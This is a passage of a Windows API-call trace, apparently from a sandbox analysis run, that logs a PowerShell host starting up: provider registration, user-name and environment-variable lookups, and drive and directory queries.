	[0488.948] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2caeaa0*="Alias", lpRawData=0x2cae830) returned 1
	[0488.950] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0488.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.950] CoTaskMemFree (pv=0x1b39cff0) 
	[0488.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.952] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
	[0488.952] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0488.953] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0488.953] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.953] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0488.953] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.959] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cb4098*="Environment", lpRawData=0x2cb3e28) returned 1
	[0488.961] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0488.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.961] CoTaskMemFree (pv=0x1b39cff0) 
	[0488.962] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0488.962] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0488.962] CoTaskMemFree (pv=0x1b39cff0) 
	[0488.962] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0488.963] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0488.963] CoTaskMemFree (pv=0x1b39cff0) 
	[0488.963] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x22d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0488.963] SetErrorMode (uMode=0x1) returned 0x1
	[0488.963] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x22d700 | out: lpFileInformation=0x22d700*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0488.964] SetErrorMode (uMode=0x1) returned 0x1
	[0488.965] GetLogicalDrives () returned 0x4
	[0488.966] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.967] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0488.967] SetErrorMode (uMode=0x1) returned 0x1
	[0488.969] CoTaskMemAlloc (cb=0x68) returned 0x43c680
	[0488.969] CoTaskMemAlloc (cb=0x68) returned 0x43c610
	[0488.969] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x43c680, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x22d6d0, lpMaximumComponentLength=0x22d6cc, lpFileSystemFlags=0x22d6c8, lpFileSystemNameBuffer=0x43c610, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22d6d0*=0x9c354b42, lpMaximumComponentLength=0x22d6cc*=0xff, lpFileSystemFlags=0x22d6c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0488.969] CoTaskMemFree (pv=0x43c680) 
	[0488.969] CoTaskMemFree (pv=0x43c610) 
	[0488.969] SetErrorMode (uMode=0x1) returned 0x1
	[0488.969] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0488.971] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d410, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.971] SetErrorMode (uMode=0x1) returned 0x1
	[0488.971] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d670 | out: lpFileInformation=0x22d670*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0488.971] SetErrorMode (uMode=0x1) returned 0x1
	[0488.971] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d410, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.972] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.972] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0488.972] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.973] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0488.974] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.974] SetErrorMode (uMode=0x1) returned 0x1
	[0488.974] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d4a0 | out: lpFileInformation=0x22d4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0488.974] SetErrorMode (uMode=0x1) returned 0x1
	[0488.974] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d240, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.974] SetErrorMode (uMode=0x1) returned 0x1
	[0488.975] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d4a0 | out: lpFileInformation=0x22d4a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0488.975] SetErrorMode (uMode=0x1) returned 0x1
	[0488.975] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0488.975] SetErrorMode (uMode=0x1) returned 0x1
	[0488.975] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d540 | out: lpFileInformation=0x22d540*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0488.975] SetErrorMode (uMode=0x1) returned 0x1
	[0488.976] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
	[0488.976] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0488.977] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0488.977] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.977] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0488.977] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.978] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cbb188*="FileSystem", lpRawData=0x2cbaf18) returned 1
	[0488.980] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0488.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.980] CoTaskMemFree (pv=0x1b39cff0) 
	[0488.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.982] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
	[0488.982] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0489.709] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0489.709] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0489.709] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0489.710] CoTaskMemFree (pv=0x3b9bb0) 
	[0489.710] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cc09c8*="Function", lpRawData=0x2cc0758) returned 1
	[0490.071] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0490.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.071] CoTaskMemFree (pv=0x1b39cff0) 
	[0490.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.912] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
	[0490.912] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0490.912] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0490.913] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0490.913] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0490.913] CoTaskMemFree (pv=0x3b9bb0) 
	[0490.929] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ce31f0*="Registry", lpRawData=0x2ce2f80) returned 1
	[0492.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0492.368] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
	[0492.368] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0492.368] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0492.369] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0492.369] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0492.369] CoTaskMemFree (pv=0x3b9bb0) 
	[0492.369] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ce8608*="Variable", lpRawData=0x2ce8398) returned 1
	[0492.376] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0492.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.376] CoTaskMemFree (pv=0x1b39cff0) 
	[0492.379] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0492.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0492.379] CoTaskMemFree (pv=0x1b39cff0) 
	[0492.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0492.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0492.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0492.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0493.267] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
	[0493.267] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0493.267] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0493.267] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0493.267] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0493.268] CoTaskMemFree (pv=0x3b9bb0) 
	[0493.268] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cfc460*="Certificate", lpRawData=0x2cfc1f0) returned 1
	[0493.783] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0493.783] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.783] CoTaskMemFree (pv=0x1b39cff0) 
	[0493.787] GetLogicalDrives () returned 0x4
	[0493.787] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0493.787] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0493.789] CoTaskMemAlloc (cb=0x20e) returned 0x426660
	[0493.789] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x426660 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0493.789] CoTaskMemFree (pv=0x426660) 
	[0493.790] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0493.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.791] CoTaskMemFree (pv=0x1b39cff0) 
	[0493.791] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0493.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.791] CoTaskMemFree (pv=0x1b39cff0) 
	[0493.809] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0493.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.809] CoTaskMemFree (pv=0x1b39cff0) 
	[0493.810] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0493.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.810] CoTaskMemFree (pv=0x1b39cff0) 
	[0493.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0493.811] SetErrorMode (uMode=0x1) returned 0x1
	[0493.811] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d590 | out: lpFileInformation=0x22d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0493.811] SetErrorMode (uMode=0x1) returned 0x1
	[0493.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0493.812] SetErrorMode (uMode=0x1) returned 0x1
	[0493.812] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d590 | out: lpFileInformation=0x22d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0493.812] SetErrorMode (uMode=0x1) returned 0x1
	[0493.813] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0493.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0493.813] CoTaskMemFree (pv=0x1b39cff0) 
	[0493.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0494.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x22d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0494.712] SetErrorMode (uMode=0x1) returned 0x1
	[0494.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x22d850 | out: lpFileInformation=0x22d850*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0494.712] SetErrorMode (uMode=0x1) returned 0x1
	[0494.755] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
